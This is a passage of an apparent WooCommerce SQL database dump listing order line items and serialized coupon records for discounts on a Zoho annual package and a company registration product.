l\";a:0:{}}'),(1747,208,'discount_amount','198'),(1748,208,'discount_amount_tax','0'),(1749,208,'coupon_data','a:24:{s:2:\"id\";i:29813;s:4:\"code\";s:11:\"countmeless\";s:6:\"amount\";s:3:\"198\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:56:37.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-07 07:14:52.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-29 22:00:00.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:31:\"Discount on Zoho annual package\";s:11:\"usage_count\";i:2;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:1:{i:0;i:29583;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:5;s:20:\"usage_limit_per_user\";i:5;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:0;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1774,213,'_product_id','29583'),(1775,213,'_variation_id','0'),(1776,213,'_qty','1'),(1777,213,'_tax_class',''),(1778,213,'_line_subtotal','990'),(1779,213,'_line_subtotal_tax','0'),(1780,213,'_line_total','792'),(1781,213,'_line_tax','0'),(1782,213,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1783,214,'discount_amount','198'),(1784,214,'discount_amount_tax','0'),(1785,214,'coupon_data','a:24:{s:2:\"id\";i:29813;s:4:\"code\";s:11:\"countmeless\";s:6:\"amount\";s:3:\"198\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:56:37.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-07 07:14:52.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-29 22:00:00.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:31:\"Discount on Zoho annual package\";s:11:\"usage_count\";i:3;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:1:{i:0;i:29583;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:5;s:20:\"usage_limit_per_user\";i:5;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:0;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1786,215,'_product_id','29583'),(1787,215,'_variation_id','0'),(1788,215,'_qty','1'),(1789,215,'_tax_class',''),(1790,215,'_line_subtotal','990'),(1791,215,'_line_subtotal_tax','0'),(1792,215,'_line_total','792'),(1793,215,'_line_tax','0'),(1794,215,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1795,216,'_product_id','28'),(1796,216,'_variation_id','0'),(1797,216,'_qty','1'),(1798,216,'_tax_class',''),(1799,216,'_line_subtotal','750'),(1800,216,'_line_subtotal_tax','0'),(1801,216,'_line_total','750'),(1802,216,'_line_tax','0'),(1803,216,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1804,217,'discount_amount','198'),(1805,217,'discount_amount_tax','0'),(1806,217,'coupon_data','a:24:{s:2:\"id\";i:29813;s:4:\"code\";s:11:\"countmeless\";s:6:\"amount\";s:3:\"198\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:56:37.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-07 07:14:52.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-29 22:00:00.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:31:\"Discount on Zoho annual package\";s:11:\"usage_count\";i:3;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:1:{i:0;i:29583;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:5;s:20:\"usage_limit_per_user\";i:5;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:0;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1807,218,'_product_id','28'),(1808,218,'_variation_id','0'),(1809,218,'_qty','1'),(1810,218,'_tax_class',''),(1811,218,'_line_subtotal','750'),(1812,218,'_line_subtotal_tax','0'),(1813,218,'_line_total','750'),(1814,218,'_line_tax','0'),(1815,218,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1816,219,'_product_id','29583'),(1817,219,'_variation_id','0'),(1818,219,'_qty','1'),(1819,219,'_tax_class',''),(1820,219,'_line_subtotal','990'),(1821,219,'_line_subtotal_tax','0'),(1822,219,'_line_total','990'),(1823,219,'_line_tax','0'),(1824,219,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1825,220,'_product_id','29583'),(1826,220,'_variation_id','0'),(1827,220,'_qty','1'),(1828,220,'_tax_class',''),(1829,220,'_line_subtotal','990'),(1830,220,'_line_subtotal_tax','0'),(1831,220,'_line_total','792'),(1832,220,'_line_tax','0'),(1833,220,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1834,221,'_product_id','28'),(1835,221,'_variation_id','0'),(1836,221,'_qty','1'),(1837,221,'_tax_class',''),(1838,221,'_line_subtotal','750'),(1839,221,'_line_subtotal_tax','0'),(1840,221,'_line_total','199'),(1841,221,'_line_tax','0'),(1842,221,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1843,222,'discount_amount','551'),(1844,222,'discount_amount_tax','0'),(1845,222,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"551\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 14:53:25.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-29 22:00:00.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:2;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1846,223,'discount_amount','198'),(1847,223,'discount_amount_tax','0'),(1848,223,'coupon_data','a:24:{s:2:\"id\";i:29813;s:4:\"code\";s:11:\"countmeless\";s:6:\"amount\";s:3:\"198\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:56:37.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-13 12:10:48.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-29 22:00:00.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:31:\"Discount on Zoho annual package\";s:11:\"usage_count\";i:4;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:1:{i:0;i:29583;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:5;s:20:\"usage_limit_per_user\";i:5;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:0;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1849,224,'_product_id','28'),(1850,224,'_variation_id','0'),(1851,224,'_qty','1'),(1852,224,'_tax_class',''),(1853,224,'_line_subtotal','750'),(1854,224,'_line_subtotal_tax','0'),(1855,224,'_line_total','199'),(1856,224,'_line_tax','0'),(1857,224,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1858,225,'discount_amount','551'),(1859,225,'discount_amount_tax','0'),(1860,225,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"551\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 14:53:25.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-29 22:00:00.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:3;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1861,226,'_product_id','70'),(1862,226,'_variation_id','0'),(1863,226,'_qty','1'),(1864,226,'_tax_class',''),(1865,226,'_line_subtotal','450'),(1866,226,'_line_subtotal_tax','0'),(1867,226,'_line_total','450'),(1868,226,'_line_tax','0'),(1869,226,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1870,227,'_product_id','70'),(1871,227,'_variation_id','0'),(1872,227,'_qty','1'),(1873,227,'_tax_class',''),(1874,227,'_line_subtotal','450'),(1875,227,'_line_subtotal_tax','0'),(1876,227,'_line_total','450'),(1877,227,'_line_tax','0'),(1878,227,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1879,228,'_product_id','70'),(1880,228,'_variation_id','0'),(1881,228,'_qty','1'),(1882,228,'_tax_class',''),(1883,228,'_line_subtotal','450'),(1884,228,'_line_subtotal_tax','0'),(1885,228,'_line_total','450'),(1886,228,'_line_tax','0'),(1887,228,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1888,229,'_product_id','28'),(1889,229,'_variation_id','0'),(1890,229,'_qty','1'),(1891,229,'_tax_class',''),(1892,229,'_line_subtotal','750'),(1893,229,'_line_subtotal_tax','0'),(1894,229,'_line_total','199'),(1895,229,'_line_tax','0'),(1896,229,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1897,230,'discount_amount','551'),(1898,230,'discount_amount_tax','0'),(1899,230,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"551\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-07-18 14:39:17.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:4;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1900,231,'_product_id','28'),(1901,231,'_variation_id','0'),(1902,231,'_qty','1'),(1903,231,'_tax_class',''),(1904,231,'_line_subtotal','750'),(1905,231,'_line_subtotal_tax','0'),(1906,231,'_line_total','199'),(1907,231,'_line_tax','0'),(1908,231,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1909,232,'discount_amount','551'),(1910,232,'discount_amount_tax','0'),(1911,232,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"551\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-07-18 14:39:17.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:5;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1912,233,'_product_id','28'),(1913,233,'_variation_id','0'),(1914,233,'_qty','1'),(1915,233,'_tax_class',''),(1916,233,'_line_subtotal','750'),(1917,233,'_line_subtotal_tax','0'),(1918,233,'_line_total','750'),(1919,233,'_line_tax','0'),(1920,233,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1921,234,'_product_id','28'),(1922,234,'_variation_id','0'),(1923,234,'_qty','1'),(1924,234,'_tax_class',''),(1925,234,'_line_subtotal','750'),(1926,234,'_line_subtotal_tax','0'),(1927,234,'_line_total','199'),(1928,234,'_line_tax','0'),(1929,234,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1930,235,'discount_amount','551'),(1931,235,'discount_amount_tax','0'),(1932,235,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"551\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-07-18 14:39:17.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:6;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1933,236,'_product_id','28'),(1934,236,'_variation_id','0'),(1935,236,'_qty','1'),(1936,236,'_tax_class',''),(1937,236,'_line_subtotal','750'),(1938,236,'_line_subtotal_tax','0'),(1939,236,'_line_total','199'),(1940,236,'_line_tax','0'),(1941,236,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1942,237,'discount_amount','551'),(1943,237,'discount_amount_tax','0'),(1944,237,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"551\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-07-18 14:39:17.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:7;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1945,238,'_product_id','28'),(1946,238,'_variation_id','0'),(1947,238,'_qty','1'),(1948,238,'_tax_class',''),(1949,238,'_line_subtotal','750'),(1950,238,'_line_subtotal_tax','0'),(1951,238,'_line_total','750'),(1952,238,'_line_tax','0'),(1953,238,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1954,239,'_product_id','62'),(1955,239,'_variation_id','0'),(1956,239,'_qty','1'),(1957,239,'_tax_class',''),(1958,239,'_line_subtotal','4650'),(1959,239,'_line_subtotal_tax','0'),(1960,239,'_line_total','4650'),(1961,239,'_line_tax','0'),(1962,239,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1963,240,'_product_id','64'),(1964,240,'_variation_id','0'),(1965,240,'_qty','1'),(1966,240,'_tax_class',''),(1967,240,'_line_subtotal','2250'),(1968,240,'_line_subtotal_tax','0'),(1969,240,'_line_total','2250'),(1970,240,'_line_tax','0'),(1971,240,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1972,241,'_product_id','31327'),(1973,241,'_variation_id','0'),(1974,241,'_qty','1'),(1975,241,'_tax_class',''),(1976,241,'_line_subtotal','75'),(1977,241,'_line_subtotal_tax','0'),(1978,241,'_line_total','75'),(1979,241,'_line_tax','0'),(1980,241,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1981,242,'_product_id','28'),(1982,242,'_variation_id','0'),(1983,242,'_qty','1'),(1984,242,'_tax_class',''),(1985,242,'_line_subtotal','750'),(1986,242,'_line_subtotal_tax','0'),(1987,242,'_line_total','199'),(1988,242,'_line_tax','0'),(1989,242,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1990,243,'discount_amount','551'),(1991,243,'discount_amount_tax','0'),(1992,243,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"551\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-07-18 14:39:17.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:8;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1993,244,'_product_id','28'),(1994,244,'_variation_id','0'),(1995,244,'_qty','1'),(1996,244,'_tax_class',''),(1997,244,'_line_subtotal','750'),(1998,244,'_line_subtotal_tax','0'),(1999,244,'_line_total','199'),(2000,244,'_line_tax','0'),(2001,244,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2002,245,'_product_id','31327'),(2003,245,'_variation_id','0'),(2004,245,'_qty','1'),(2005,245,'_tax_class',''),(2006,245,'_line_subtotal','75'),(2007,245,'_line_subtotal_tax','0'),(2008,245,'_line_total','75'),(2009,245,'_line_tax','0'),(2010,245,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2011,246,'discount_amount','551'),(2012,246,'discount_amount_tax','0'),(2013,246,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"551\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-07-18 14:39:17.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:9;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(2014,247,'_product_id','28'),(2015,247,'_variation_id','0'),(2016,247,'_qty','1'),(2017,247,'_tax_class',''),(2018,247,'_line_subtotal','750'),(2019,247,'_line_subtotal_tax','0'),(2020,247,'_line_total','199'),(2021,247,'_line_tax','0'),(2022,247,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2023,248,'_product_id','31327'),(2024,248,'_variation_id','0'),(2025,248,'_qty','1'),(2026,248,'_tax_class',''),(2027,248,'_line_subtotal','75'),(2028,248,'_line_subtotal_tax','0'),(2029,248,'_line_total','75'),(2030,248,'_line_tax','0'),(2031,248,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2032,249,'discount_amount','551'),(2033,249,'discount_amount_tax','0'),(2034,249,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"551\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-07-18 14:39:17.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed 